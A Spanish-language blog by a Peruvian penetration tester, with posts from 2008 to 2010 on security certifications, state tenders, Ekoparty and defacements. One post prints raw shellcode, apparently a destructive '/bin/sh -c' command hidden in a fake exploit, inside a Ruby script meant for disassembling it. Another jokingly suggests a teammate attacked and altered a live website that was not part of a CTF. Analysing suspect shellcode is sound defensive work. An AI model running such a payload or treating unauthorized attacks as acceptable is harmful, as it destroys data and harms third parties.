En los últimos meses he visto como personas de Ecuador, Honduras y Perú aprenden técnicas de hacking teoricamente, luego hacen algunas pruebas y cuando son sometidos a retos del mudno real es que realmente empiezan a disfrutarlo. En lo personal, quisiera ver más expertos en hacking en Perú, sean de Open-Sec o no, pero, que se dediquen y que sean responsables por lo que hacen. Que no sean ejecutores de herramientas ni consultores de alto nivel, sino gente que investigue a fondo, que asuma retos y que entregue una buena calidad en cada cosa que ejecute.

Tecnicamente puedo decir que, para varias, los últimos meses han sido de dedicación casi total a MetaSploit con algunas paseadas por NeXpose/Sapyto(bizploit) y una búsqueda constante de una herramienta automatizada para analizar webs que de veras la haga, pero, hasta ahora, la mejor herramienta sigue siendo la revisión "a mano" del los web (claro, usando los queridos NoScript, Agent Switcher, Poster, Tamper Data, Grounspeed, Firebug y Hackbar).

No puedo dejar de comentar en esta especie de catarsis bloggera que estoy haciendo después de mucho tiempo, la noticia del día : Novell fue adquirido por Attachmate. Sabía que hacian emuladores de terminal y nada más. Creo que es la mejor forma de terminar para Novell en las manos de un pequeño desconocido que descuartizado por un gigante aunque el holding que esta detrás de Attachmate es liderado por Microsoft y ya sabemos de donde salió el dinero para esa compra.
Novell se constituyó en una parte muy importante de mi vida, pero, movimientos absurdos como comprar CTP y dejar que sus "ejecutivos" asuman el control de una corporación de tecnología hizo que entre otras cosas despidan a Eric Schmidt, creador del proyecto de Java en Sun y hoy día CEO de Google.

Hasta la proxima!

Ekoparty 2010

2010-10-02T22:18:00.004-05:00

Esta fue una de las aventuras más simpáticas de los últimos tiempos. Ya el año pasado nos quedamos sin ir por la carga laboral y este año nos lanzamos.
Era importante para nosotros ir como team y para ver que tal estamos comparados con un medio tan avanzado y competitivo como el argentino, en otras palabras, que tan "hackers" somos y de hecho, el resultado fue positivo para nosotros, pero, hay que tener en cuenta que en Argentina no solamente hay buenos pen testers, ethical hackers, etc. sino excelentes investigadores y desarrolladores en seguridad informática. Mauricio Velazco se preguntaba : y ellos estan todo el día investigando para encontrar esas vulnerabilidades y desarrollar exploits ? La respuesta es SI porque allá hay empresas que se dedican a desarrollar herramientas de hacking, tanto como software libre como comercial. Ejemplo de todo ello son Core Impact (de Core Security), CANVAS (de Immunity) y la incorporación de w3af al "conglomerado" de Rapid7 que ya cuenta con MetaSploit, así como, Netifera y el ataque de Padding Oracle aplicado a la __viewstate de .Net donde el 50% del mérito lo tiene un argentino, Juliano Rizzo.
Aca nuestra investigación se da en forma posterior porque nos dedicamos a entender las vulnerabilidades reportadas y luego, a comprender como funcionan las herramientas o exploits lanzados, y, en algunos casos, para corregirlos o adecuarlos a nuestras necesidades (aunque ya tenemos 3 nuevas herramientas que lanzaremos este mes en el evento de ISACA el 22 de octubre).
A continuación la aventura Ekoparty en imágenes :
Perú estuve super presente en Ekoparty 2010.
Estuvimos 4 de Open-Sec, Juan Pablo, Felipe y Miguel (más datos omitidos a propósito).

La danza diabólica de las habitaciones compartidas.
Quién duerme con MV ? Por aca! Pero, luego encontró su pareja ideal : MU, durmieron juntos 3 noches y fueron felices por siempre. MV se quedó unos días más en Bs Aires haciendo los trámites del matrimonio.
(El del gesto diabólico no es ninguno de los M*).

Nos mandaron un mail diciendo que lleguemos a las 7:30 am., como buenos peruanos puntuales, llegamos a las 9:00 de la madrugada y quedó claro que argentinos y peruanos somos hermanos, más puntuales imposible!

El escenario de Ekoparty. El lugar donde se realiza es bien particular, hay que tener la mente bien abierta para encontrarle lo simpático, pero, el escenario como tal es buenísimo : un logo de Ekoparty en neón, un panel suficientemente grande, buen audio, una decoración entretenida, muy bueno.

A la izquierda : MV en el CtF. Lo curioso fue que alguien dijo : es un web! MV buscó, lo encontró y empezó a atacarlo. Rato después alguien le dice que era un web que estaba publicado en Internet y los retos eran de esos que solo entienden los creadores y sus amigos. Curiosamente, el web del reto terminó siendo "alterado". Quién habrá sido ?
A la derecha : MU, CC y JQ haciendo lockpicking que luego será aplicado en pruebas de seguridad física.
A la izquierda : seleccionando "exploits".

A la derecha : MU meditando sobre el padding oracle attack...oooommmm...ZZZZZZ

Dicen que la mejor defensa es el ataque, MV lo pone en práctica...

A la izquiera : peruanos en el subte.

A la derecha : reciclador tecnológico.

An score of 98% says that Mauricio Velazco is a Certified Ethical Hacker by EC Council...3 C|EH @ Open-Sec

2010-05-10T16:07:00.003-05:00

Para nosotros es un tema bien importante el reconocimiento a quienes demuestran feacientemente su conocimiento y el hecho que Mauricio Velazco haya obtenido el dia de hoy la certificacion de C|EH es muy importante por varias razones :
1. Es el miembro mas joven de nuestro equipo y afaik, es el C|EH mas joven en Perú con 24 años.
2. Ya lleva cerca de 2 años haciendo unicamente ehtical hacking y computación forense y el puntaje obtenido en el examen demuestra que su experiencia ayudo mucho para el examen (no llevo un curso o similar).
3. Open-Sec resulta siendo la unica empresa local que cuenta con 3 C|EH en staff permanente.
4. Este es solamente el inicio de una saga de certificaciones que obtendra Mauricio, hoy conversabamos sobre la proxima, CPTE.

FELICITACIONES MAURICIO!!!

UPDATE : El día de ayer también obtuvo su certificación como C|EH el consultor Rolando Antón. El no es parte del equipo de Open-Sec, es parte del equipo de Etel Perú, pero, es un gran Amigo nuestro y mio en particular.

Dado que hoy día Mauricio Velazco cumplió 25 años, desde hoy hasta octubre de este año, Rolando es el C|EH peruano más joven (AFAIK).

FELICITACIONES ROLANDO!!!!

Cuántos profesionales certificados en hacking son peruanos ?

2010-04-09T09:34:00.001-05:00

Invitación a registrarse :
http://www.linkedin.com/groups?home=&gid=2932414&trk=anet_ug_hm

Pago por ver: Qué hace este shellcode ?

2010-04-07T11:50:00.002-05:00

Hace unos días le paso algo a un amigo y un post de HD Moore sobre las cosas "ocultas" en los shellcode me hicieron pensar en postear algo al respecto y que sea técnico para que este blog no se muera.
Lo que me terminó de convencer fue que en una lista de gente certificada alguien consulto sobre un error que le aparecia al compilar un exploit que se bajo de exploit-db. Facil : queria compilar un programa en C para MS Windows en Linux.
Dado que este blog no es educativo, solamente me limitare a decir que hay demasiada informacion en Internet sobre exploits, hay que saber programar para usarlos (si no, troyano para adentro o cualquier cosa similar y/o peor).
Asi que dicho eso, para jugar con los exploits y shellcodes se requiere tener skills y experiencia de desarrollador, principalmente en C (pero, no es lo único) y en Assembler.
Si tengo un shellcode entre manos :
1. Lo paso a algo que pueda entender : ensamblador.
2. "des-ensamblo" el codigo para revisar que hace el programa.
3. Puedo generar el binario ejecutable, correrlo en una maquina virtual de scratch y bajo la "supervision" de un trazador (strace por ejemplo).

Los puntos 1 y 2 se pueden hacer con (no son las unicas formas) :
A. Un script donde se pega la porcion del shellcode y se obtiene un binario (no ejecutable, solo objeto) :
#/usr/bin/ruby
myfile = File.new("shellcode.bin", "w")
shellcode = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"+
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"+
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"+
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"+
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"+
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"+
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
myfile.write(shellcode)
myfile.close

B. Luego, a leer el shellcode en ensamblador :
ndisasm -b 32 shellcode.bin

El resto, para un proximo post mientras los que no sabian estas cosas repasan su ensamblador.

Discusion sobre requisitos para hacer un Ethical Hacking

2010-02-03T15:19:00.003-05:00

No habia querido postear sobre este tema porque cada que posteo algo no tecnico me siento MAS viejo y porque aun no se daban analisis y conclusiones mas alla de mis (nuestras) opiones y convicciones, pero, tambien de algunos hechos reales.

Ahora que ya todo es informacion publica y esta oleado y sacramentado, si me decidi a compartir este hecho : se aperturo un concurso de contratacion para un servicio de ethical hacking en una entidad del Estado Peruano y las bases fueron observadas por un postor en 3 aspectos.

A continuacion la reproduccion de los requerimientos, las observaciones y mis opiniones :

1. Se solicitaba :

"Copias simples de las certificaciones relativas a seguridad informática (cada uno de los consultores deberá contar con un mínimo de 01 certificación), la certificación deberá tener una antigüedad no menor a seis (06) meses. No se aceptarán certificaciones emitidas por fabricantes de hardware y/o software.
La omisión de alguno de los documentos enunciados acarreará la descalificación de la propuesta.
7 PERSONAL A CARGO DEL SERVICIO
Todos los consultores deberán contar con mínimo una (01) certificación relativa a seguridad informática, las certificaciones deberán tener una antigüedad no menor a 6 meses, no se aceptarán certificaciones emitidas por fabricantes de hardware y/o software."

La observacion presentada indica :

"En estos puntos observamos que solicitar certificados con antigüedad no menor a seis meses es limitante y restrictivo, está dirigido a que exista un único postor con consultor que tiene ese tipo de certificado con ese intervalo de tiempo. Con este requisito innecesario no podré participar en este concurso público y supongo que muchos postores también, por lo expuesto solicito retirar estos requisitos innecesarios y restrictivos."

Lo curioso de esto es que hubiese sido bueno tener la fuente de tal informacion estadistica porque dentro de lo que yo conozco existen por lo menos 4 C|EH en Perú que si cumplen con tener mucho mas antiguedad con su certificacion que 6 meses.
Por ello, esa observacion, cuando menos, me parece que muestra desconocimiento del mercado local de ethical hacking.

2. Se solicitaba :

"El Consultor Principal del equipo de consultores deberá contar con una certificación correspondiente a labores de hackeo ético en modalidad de ataque, es decir, certificaciones como Certified Ethical Hacker, EcCouncil Certified Security Analyst, Licensed Penetration Tester, OSSTMM Professional Security Analyst, OSSTMM Professional Security Tester, Certified Pen Testing Specialist, Certified Pen Testing Expert, GIAC Penetration Tester y/o Offensive Security Certified Professional. No se aceptarán certificaciones relativas a seguridad de la información, forensia ni relativas a productos en defensa o análisis de intrusiones."

La observacion presentada por el mismo postor indica :

"Observamos que según la Ley de Contrataciones y Adquisiciones del Estado prohíbe la referencia a marcas o nombres comerciales, patentes, diseños o tipos particulares, por lo expuesto solicitamos retirar los nombres de estas certificaciones mencionadas por estar transgrediendo la Ley."

Esto me parece parcialmente correcto. Es decir, la Ley mencionada indica exactamente eso, pero, la referencia es para compras de activos, principalmente, ya que no se puede pedir comprar un equipo marca ACME en las primeras compras. Esto es igual absurdo porque al revisar las especificaciones tecnicas, resulta que casi siempre, solo el equipo ACME cumple.

Pero, no es correcto del todo porque al indicar "certificaciones como" se da cabida a las mencionadas y otras mas para que no ocurra que algun postor se aproveche (como ya ha ocurrido muchas veces) y presente consultores con certificaciones genericas de seguridad (como GSEC) o de analisis de intrusiones (que implica conocer como se produjo un ataque, pero, no certifica el conocer como hacerlo, esto pasa en SANS/GIAC donde hay certificaciones diferentes como GCIH y GPEN, respectivamente).
Otra cosa que ocurre es que presentan o piden certificaciones como CISSP, CISA o CISM como si estas fueran referencias a conocer como realizar un ethical hacking.

3. Se solicita :

"Para la calificación en este factor, el postor deberá presentar el plan de trabajo detallado en los términos de referencial los cuales se deben ser precisados, éste contendrá la metodología OSSTMM , el cronograma usando las herramientas gantt, el equipamiento e infraestructura que se utilizará durante todas las pruebas, la descripción de las actividades así como la lista y descripción de las herramientas.

La asignación de puntaje será de acuerdo al siguiente criterio:

Presenta Plan de Trabajo detallado completo 25 puntos
No presenta plan de Trabajo completo 00 puntos"

El mismo postor plantea la siguiente observacion :

"Observamos que la solicitud de la presentación de un plan de trabajo para la calificación es muy ambigua, solicitamos eliminar este requisito por ser ambiguo en su calificación y se presta a favorecer a un determinado portor con una calificación subjetiva y no cuantitativa o en tal caso solicitamos nos alcancen el detalle completo del contenido del Plan de Trabajo indicando cuanto vale cada parte del plan de trabajo para que llegue a sumar los 25 puntos. Tenemos derecho a conocer a que las calificaciones sean precisas y no ambiguas por ser un Concurso Público."

Esto si es sumamente preocupamente porque el postor indica que la calificacion es ambigua. El tema es bien simple : te dicen que debe contener el plan de trabajo, preparalo, presentalo y listo, tienes el puntaje. Ahi no dice que se daran mas o menos puntos por el mejor o peor plan de trabajo y encima solicitan mas detalle.

Dado que no quedaron conformes con la respuesta de la entidad, pidieron que el titular de la misma se manifieste al respecto (el Ministro) y recibieron tambien el rechazo a las mismas aunque incluyeron una precision respecto a que las certificaciones mencionadas son solo un ejemplo y que de presentar otras similares, pero, no mencionadas, seran aceptadas.

Luego de conocer las observaciones planteadas me anime a participar dado que cumplimos perfectamente con los requisitos y, obviamente, el postor que interpuso las observaciones desistio de participar. Corrimos solos y ganamos porque cumplimos con los requerimientos e incluso otros mas complejos.

El parrafo anterior es unicamente una muestra de la transparencia de este hecho, al menos de mi parte, ya que me llamo mucho la atencion encontrar un proceso similar en el cual este postor gano con unos requerimientos mas particulares aun (el jefe de equipo tenia que tener las certificaciones de CISM, CISSP y GCIH para obtener el maximo puntaje en un factor especifico) y donde tambien se calificaba el plan de trabajo (se indicaba puntaje por cada punto del mismo, pero, igual, no habia calificacion por mejor o peor plan que es lo que si haria que sea ambigua).

Como dato anecdotico, la seccion donde se describen los alcances, la descripcion y entregables del servicio fueron tomadas de documentos creados por nosotros y que siempre los hemos compartido de forma abierta, asi que probablemente llegaron a manos de la entidad que convoco y los uso.

- Nuestro mercado peruano carece de una gran cantidad de profesionales certificados en seguridad como encontramos en otros paises cercanos y, mas aun, en temas de ethical hacking.

Incluso certificaciones base como GSEC son presentadas como demostracion del conocimiento y experiencia en ethical hacking cuando solo certifican conocimientos basicos de seguridad.

El hecho concreto es que en nuestro pais contamos con por lo menos 6 C|EH y 2 GPEN, casi todos trabajan en proveedores y por ello, si se deben exigir certificaciones similares. No menciono otras como OCSP, OSCE, OPST, OPSA, CPTS, etc. porque hasta donde he visto y conozco, solo Andres Morales las tiene aca.

- Es valido encontrar empresas que empiezan a ganar experiencia en consultorias de seguridad de la informacion, auditorias, etc., pero, no es valido permitir que se conviertan en buscadores de oportunidades sin considerar que podrian hacer que nuestro mercado no suba de nivel.

Si subcontratan consultores o realizan alianzas para obtener negocios y aun asi no cumplen con los requerimientos, ya lo haran en tiempos posteriores.

El siguiente nivel de exigencia deberia ser demostrar que las certificaciones aun estan vigentes. Vemos constantemente que hay personas que se presentan con certificaciones que ya las perdieron por no renovarlas y certificaciones que ya no existen. Incluso, si recuerdan, impugnamos un concurso donde gano una empresa con base en el extranjero que presento un consultor con un certificado adulterado.

Las certificaciones de seguridad requieren ser revalidadas continuamente mediante la obtencion de creditos por actividades o retomando los examenes.

- La respuesta del titular de la entidad sento precendete administrativo porque hubiese sido bien grave que las observaciones sean admitidas ya que se habria generado una especie de jurisprudencia para que no se exija antiguedad en las certificaciones, certificaciones acordes al objeto de la convocatoria y que los planes de trabajo no sean calificados.

- Los que se dedican a consultoria de seguridad deben invertir en su mejor herramienta : los consultores. Es decir, deberian invertir en certificarlos.

Hace unas semanas publicaron un articulo mio en America Sistemas donde planteaba la idea de tener una suerte de cyberteam en Perú y, claro, convocado por el Estado. En esta oportunidad, planteo que el Estado deberia definir unos terminos de referencia base para contrataciones de servicios de ethical hacking o similares y que sean desarrollados despues de sostener reuniones con los proveedores locales para que guarde coherencia y vigencia.

Saludos!

Nombre Comercial: PEPITA

2010-01-07T15:25:00.002-05:00

Yo creo que algun error en el sistema porque no puede ser el nombre comercial de una persona natural que hace consultoria en seguridad directamente o por su empresa...
O tal vez se motivaron con la publicidad de Creatividad de Inca Kola...jejeje

El mejor team de ethical hackers peruanos...

2009-12-24T22:33:00.001-05:00

Ultimo OPEN-SEC ETHICAL HACKER del 2009

2009-12-24T22:31:00.002-05:00

Las imágenes hablan por si solas...

Look Ma: H.D. Moore is following me!!!

2009-10-21T16:48:00.002-05:00

Look Ma: I'm with Bruce!!!

2009-10-21T16:46:00.001-05:00

LimaHack 2009

2009-10-18T00:33:00.000-05:00

www.limahack.com

Absurdo Logico

2009-10-04T23:28:00.003-05:00

No se cuantas personas lean este blog porque he dejado de postear con frecuencia, pero, al menos se que esta indexado en Google y algun dia alguien lo leera.
Hay un par de casos que me han llevado a un convencimiento y que corresponde a lo que es un dicho popular : el peor enemigo de un peruano, es otro peruano.
Hace un tiempo tuvimos en mi organizacion un caso de impugnacion de un concurso publico con una entidad del Estado porque un postor presento un certificado adulterado de su consultor principal. La impugnacion la realizamos ante CONSUCODE (hoy OSCE) y luego de demostrar que teniamos la razon, le retiraron la buena pro, nos la dieron a nosotros e indicaron que dicha institucion del Estado debia tomar acciones.
Al postor que presento los documentos adulterados no solamente no lo han sancionado (esto fue setiembre del 2008) sino que incluso participo en un concurso similar para un servicio tambien similar solicitado por el OSCE.
Hoy recibi una citacion del Ministerio Publico para dar testimonio respecto a la denuncia que la institucion del Estado presento contra el consultor. Es bueno que se tomen acciones, pero, por que no he recibido una citacion similar para una denuncia con respecto al postor que presento los documentos adulterados ? Como les consta a estas personas (porque las instituciones son manejadas por personas) que fue el consultor quien adultero los documentos y no alguien del postor ? Sera que han denunciado a ambos y por esas cosas del tiempo y destiono luego me pediran testimoniar por la denuncia contra el postor ?
Ojala sea lo ultimo.
El otro caso corresponde a una institucion educativa de prestigio que hace un tiempo convoco a un consultor extranjero para un evento sobre hacking, dio una charla y tal vez hasta dieron un curso. Al poco tiempo empezaron a circular notas sobre esta persona por Internet y hasta sacaron un site donde se difundia el hecho que utilizara de manera no autorizada el nombre de una organizacion mundial que certifica hackers y que entregara material de ellos sin autorizacion.
Por la documentacion que he visto desde su site, usa informacion y logos que solo pueden ser usados por quienes representan a esta organizacion y en conversaciones con quienes la representan en Latino America nos han indicado su molestia por como esta persona hace uso de logos, graficos e informacion sin su autorizacion.
Bien, esta institucion educativa peruana volvio a convocar a este consultor este año para otro evento y lanzamiento de un curso de ETHICAL hacking. Ellos parecen no tener acceso a Internet, seguro viven aun en la epoca de los teletipos y las maquinas de escribir Olivetti.
A pesar que se les ha informado de todo esto, hacen oidos sordos y un amigo nuestro les hablo en persona sobre el tema, su respuesta fue alucinante : es que no hay gente como el aca...es decir, se referian a su capacidad y certificaciones.
Yo debo atribuir semejante ignorancia al hecho que la seguridad es un tema nuevo en nuestro pais y no a una majaderia, pero, no puedo evitar pensar que le creen al consultor porque es EXTRANJERO.
Asi que cuando vemos que nuestro mercado de seguridad informatica no crece como en otros paises, no basta con echarle la culpa a la negligencia corporativa, debemos analizar si no existen actitudes intermedias que minan cualquier tipo de avance de iniciativas locales favoreciendo a extranjeros solo por la estupidez de creer que todo lo que viene de afuera es mejor y mas grande y, claro, honesto.

Una joyita !

2009-09-03T23:15:00.002-05:00

Andrés Morales Zamudio: Andrés Morales is member of the CSIRT (computer security incident response team) team operated by Universidad Nacional de Ingenieria in Lima and is a member of the GIAC Advisory Board. He earned his Bachelor in Systems Engineering from the Universidad Nacional de Ingenieria. Also he holds OSCP, OSWP, GCIH, GPEN, CPTS and CEH certifications. In addition, Andres is currently pursuing his OSCE certification.

He is currently involved with Incident Handling, Penetration Testing and Forensic Analysis for a national organization. He enjoys giving network and security training courses for the internal CSIRT-UNI staff.

Por si no se dieron cuenta, es PERUANO!

Para no postear sin poner algo tecnico :

Preguntadole a un DNS por el contenido de su cache :

dig @ip_del_servidor_DNS www.milw0rm.org A +norecurse

Tiempos turbulentos....

2009-08-23T00:20:00.005-05:00

En el afan de mantener este blog con un perfil tecnico, he terminado sin postear desde el año pasado debido a una inmensa carga de trabajo.
De hecho, tanto esfuerzo tiene su fruto y nuestro equipo al dia de hoy ha desarrollado proyectos de ethical hacking, computacion forense y un par de analisis de brechas de InfoSec en nuestro querido Perú, Ecuador y Panamá, principalmente.
Ni tiempo hemos tenido para mas certificaciones (aunque parece que Cesar Cuadra ya saco el OSCP y estamos esperando la confirmacion) y planes como asistir a eventos como Ekoparty se han frustrado por esta carga de trabajo (de hecho quisimo participar en todo el CTF y solo lo hicimos en apenas un juego).
De hecho postee algo en el blog de Open-Sec (que tampoco se ha hecho mucho), se puede ver en : http://ehopen-sec.blogspot.com/
Al menos, el bloggear ya no me sirve como esa catarsis que resultaba cuando blogeaba en BlogCity, pero, a veces se extraña un poco y aun las redes sociales no cubren ese aspecto y Twitter es algo peor aun porque se espera una actualizacion constante de informacion.
De todas formas, este post no puede pasar sin poner algunas cosas tecnicas asi que ahi van :

1. Reglas Eticas del blogger :
- No bloggear lo de otros como si fuese de uno (no seamos hackers de blog!!!)
- No irrogarse conocimientos ni certificaciones que no le pertenecen.
- Blogear para difundir el conocimiento, no para vanagloriarse.

2. He empezado a usar Leo, un editor que sirver para muchas cosas, pero, principalmente permite manejar estructuras de informacion basandose en XML y me sirve perfecto para tomar notas personales y de los trabajos que hacemos. Hay un par de herramientas bien interesantes que hacen algo similar o son mas especificas, pero, requieren mucho mas software que Leo (Dradis y Yaptest).

3. Haciendo algo de "inteligencia competitiva" me encontre con este XSS :
http://www.xssed.com/search?key=infosecurityonline, lo sabran ellos ? Bueno, yo creo que no...

4. Para saber cuantos plugins tenemos cargados en nuestro Nessus :
find /opt/nessus/lib/nessus/plugins -name "*.nasl" | wc -l

5. Nessus 4.01 tiene una limitacion de hacer scanning a no mas de 16 hosts simultaneamente en el Home Feed :
SCAN-ERROR
Too many live hosts scanned in a row while on a HomeFeed - please upgrade to a ProfessionalFeed
Nessus ID : 19506
Reducing max_hosts to 16 (HomeFeed)

Hay mucho mas sobre nuevas herramientas (algunas mejor utilizadas como MSF y otras incluso corregidas como metagoofil), nuevas tecnicas y nuevas experiencias y materias de posteadas mas largas.

Algunos logros personales :
-Open-Sec works like a charm!
-El proximo mes voy como profe invitado a la ESPOL en Ecuador para su Maestria en Seguridad Informatica Aplicada (mi primera vez como profe invitado para una maestria).

Algunas metas :
-Este año debo sacar otra certificacion, puede ser una de forensia ya que no estoy seguro si otra de ethical hacking o penetration testing realmente daria valor a nuestros clientes. No me emociona el CISSP (pero, tampoco la veo poca cosa, al reves).
-Realizar el LimaHack 2009

La justicia existe, Defaceos y seguridad informática en el Estado Peruano

2008-12-03T07:13:00.002-05:00

Como ultimamente hago, de un solo post, varios temas.

=>Prefiero empezar positivo : tras un largo proceso de 2 meses, finalmente se hizo justicia en un proceso de contratación en el Estado donde nuestro equipo perdió ante una conocida empresa local (regional?) que presentó un certificado GIAC adulterado y que me tocó impugnar. Finalmente, el Tribunal de CONSUCODE falló a nuestro favor.
Es cierto que la comunicación del Director de GIAC sobre este certificado y la ausencia de respuesta de la mencionada empresa fueron los factores determinantes, pero, también la justicia con la que actuaron los miembros del Tribunal.
Si la empresa sabía de esa adulteración o fueron sorprendidos por esta persona, es algo que ya no me compete y será revisado por la autoridad que corresponda.
Ahora, ha ejecutar el proyecto!

=> Defaceos, Defacements, Hackeos, "Hacked by". Es casi imposible pertenecer al mundo del hacking y dejar de comentar respecto a estos temas. Publicamente, siempre digo que hacer un defacement (como en realidad se debe llamar a los "hackeos de web") es una labor simple para gente que recien empieza a hacer hacking.
De esta forma, los "atacantes" consiguen notoriedad porque el 99% de las veces las vulnerabilidades de los sitios afectados no permiten llegar a los verdaderos activos de información de la organización, pero, en verdad, hace tanto daño como si le hicieran "grafiti" a la fachada del local principal de estas organizaciones, feo, no ?
Esta semana, debido a una nueva discusion entre peruanos y chilenos, alguien defaceo el web institucional del Ministerio de Defensa. Sera porque no le otorgo valor a estos "ataques" que me entere mucho tiempo después de ocurrido el hecho o porque tengo mucho trabajo.
Es más, en el último ethical hacking que realizamos, una de las preocupaciones principales de la organización era saber si podían "defacearle" el web y realmente los problemas iban por otro lado que si podían afectar a sus activos de información bajo ataques realmente de hackers.
El problema que yo veo es : si me pintan la fachada con grafiti, la pinto como debe ser y espero que Serenazgo este más listo la próxima, pero, si me "defacean" el web, basta con restaurar el contenido original ? Por favor, hagan algo por asegurarse! Y ese efecto, conocido como "re-defacement" no es solamente local, pasa en TODOS lados!
=> El tema anterior me lleva a este : por qué no invierten en seguridad informática como debe ser ? En los años que tengo en este tema, solo conozco de 2 casos donde han hecho inversiones serias en UNICAMENTE 2 personas para entrenarlos como CEH y GPEN (además de otros cursos como análisis de intrusiones), respectivamente.
Los servicios de ethical hacking siempre corresponden a costos bajos que no superan los 10 ó 12 mil dolares en el 90% de los casos.
Las inversiones en protección de seguridad perimetral hacia Internet son muchas veces espectaculares, pero, siempre orientadas por factores netamente comerciales. Como siempre digo, aún los clientes creen que los vendedores se preocupan por ellos cuando lo único que les importa es su cuota de venta y sus comisiones. Bueno, al fin, de eso viven.
Los técnicos de estas empresas son realmente expertos en los productos que sus empleadores venden y probablemente algunos más, pero, su conocimiento y experiencia en hacking es cercano al nulo porque invierten en entrenarlos en el despliegue de los productos y no en aprender como se comporta un atacante.
Localmente, la mayoría de empleos de tecnología tienen sueldos medios a bajos y en el Estado es peor aún, debido a eso, EN LA MAYORIA DE ENTIDADES, no se cuenta con personal adecuado en términos de preparación previa, skills y experiencia. Y cuando se tiene alguien con skills, no invierten en entrenarlo en temas de hacking.
Después de ese defacement al Ministerio de Defensa, que harán además de haber restaurado el contenido original y mantener el error en el phpBB (que creo es por donde ingresaron) ?
Revisarán cuando menos su seguridad perimetral hacia Internet ? Revisarán sus políticas de seguridad informática ? sí las tienen, Harán un aseguramiento de los servicios tecnológicos que ofrecen ? Mandarán a su gente a prepararse de verdad en seguridad informática y no a manejar productos ? Seguirán usando Linux por ser uno de los sistemas operativos más seguros y no solamente porque son más baratos o son gratuítos ? Alguien les hará ver que la seguridad también se da a nivel de las aplicaciones ?
Lo más seguro es que les caerán 30 vendedores diciendoles que no debieron usar Linux, que usen MS Windows, que lleven los cursos de seguridad de Microsoft, que se certifiquen, que usen "firewalls basado en hardware" y no software, que compren! que compren! que compren!
Ah! Y cómo sabrán después de toda la inversión que sí estan seguros ? "Nuestros ingenieros titulados y colegiados expertos en seguridad han evaluado la seguridad de la protección instalada por ellos mismos usando las más avanzadas herramientas utilizadas por los hackers".
Ojala siquiera supieran usar nmap adecuadamente, menos pensar en verlos probando si el filtro de contenido detiene el envio de un exploit o una inyección del tipo que sea.
=> Espero tener tiempo el resto de la semana para un post técnico que hace tiempo no hago.

Dos temas : un orgullo peruano GPEN y una pelicula extraña para nuestros dias

2008-11-03T00:54:00.002-05:00

De alguna forma me hace sentir orgulloso que a la fecha los unicos certificados como GIAC Penetration Tester somos 2 peruanos (el otro es Andres Morales, el mismo que comento en este blog, miren ese puntaje!). El mismo que gano el war game de Ekoparty. Go for the CEH Andres!

Lo de la pelicula parece que no tiene nada que hacer con esto, verdad ? Pues asi es, pero, me parecio tan importante como lo anterior.
High School Musical es una pelicula fuera de serie, de lo mejor que he visto al menos durante este año. Claro, lo primero que uno piensa es que es una pelicula gringa (green-ga?) para adolescentes huecos y que no tiene nada que hacer con nuestra pauperrima realidad peruana.
Yo tengo varios aspectos que admirar de esa pelicula :
1. La demostracion de enorme creatividad de Disney. Despues de Dreamworks, Pixart, etc. parecia que estaba muerto, pero, no andaba de parranda. Ratatouille gano el Oscar y High School Musical es una pelicula para adolescentes que fascina a todos los jovenes. Definitivamente, Disney resurgio.
2. Aquellos que disfrutan de buen sonido, coreografia, escenografia y calidad musical, tienen que ver esta pelicula. Digna de los mejores musicales y partituras de Broadway.
3. Para calabacines ? No! que bah! Desde los dialogos hasta las letras de las canciones describen situaciones comunes que se presentan entre amigos, enamorados jovenes, padres e hijos y cuestiones y cuestionamientos de los jovenes.
4. Mi hija mayor, adolescente, me pregunta : Por que todas las peliculas peruanas tienen que poner el sexo como motivo principal ? En High School Musical apenas se da un beso! Wow! Una pelicula de nuestros dias que fascine a los jovenes sin sexo!
5. El sentir final es que no todo es negro en el panorama juvenil, que hay cosas sanas que generan sentiemientos sanos y que uno quisiera tener todo ese talento y energia que demuestran esos jovenes en la pelicula. (Keneth Ortega es el creador).

Ahora de "quacker" a comentarista de peliculas! Facil se hace mas billete por ahi....

Ekoparty, BS-Con, Andres y otras hierbas

2008-10-15T02:15:00.002-05:00

Durante fines de setiembre y principios de octubre se llevaron a cabo un par de convenciones de seguridad en Argentina que han sido bien interesantes. A mi modo de ver, más por organizar muy bien estas convenciones y compartir conocimiento diverso con los asistentes a través de charlas y cursos rápidos.

Algunos de los tópicos resultan simpáticos solamente, pero, otros son vigentes y hasta proyectados al corto plazo estricto. Ademas, estas convenciones estan rodeadas de actividades de competitivas y recreacionales.

De hecho, Andres, un joven que hizo unos comentarios a un post mio y que conoci en una charla que di en una universidad, asistio a una de estas convenciones (Ekoparty) y gano una competencia de las que me parece le gustan, Capture the Flag. Bien hecho, no me llama la atencion porque en esa charla parecia que el unico que me entendia era el y era el unico que estaba informado.
Estoy seguro que pronto lo veremos galardonado con esas certifficaciones vanales y faciles de obtener como CEH, GPEN, CISSP, etc. (es un sarcasmo, just in case).

He evitado decir "eventos" y mas bien los califico como convenciones porque un evento es lo que hacen los vendedores de productos y cebo de culebra en aquellos "eventos de seguridad" que si han llegado a nuestro pais.
Importante : Aunque no comulgo con I-Sec, si he de reconocer que su llegada a Perú puso de moda el tema de seguridad, antes, eran "esfuerzos populares que nunca derriban la negligencia corporativa".

Ahora, que nos falta a los peruanos para poder organizar un Ekoparty, por ejemplo ? Dos cosas :
1. Hacer a un lado cualquier tipo de ego que impide que la gente metida en seguridad se una para avanzar como comunidad de profesionales.
2. Querer firmemente compartir el conocimiento para elevar el nivel local.
Aun recuerdo cuando aperture un canal IRC llamado hackingperu. Entraron de todos lados, para que ? Para preguntar donde conseguir libros piratas, que se les enseñe a crackear y en 2 o 3 casos, si para aprender sobre hacking. Coloboradores ? Cero! Nadie asumia el compromiso de dar una charla por el canal o algo similar.

A mi y la gente que trabaja conmigo no nos parece extraño esto porque estamos metidos en el mundo del Open Source y Linux, asi que para nosotros es normal, comun, de todos los dias.

Seria buenisimo tener algo como el Ekoparty Lima, pero, organizado por nosotros y no que tal vez tengan que venir de Argentina a organizarlo (aunque si sugeriria consultarles en base a su experiencia en la organizacion).

GIAC Certified Penetration Tester desde ayer

2008-09-26T07:36:00.002-05:00

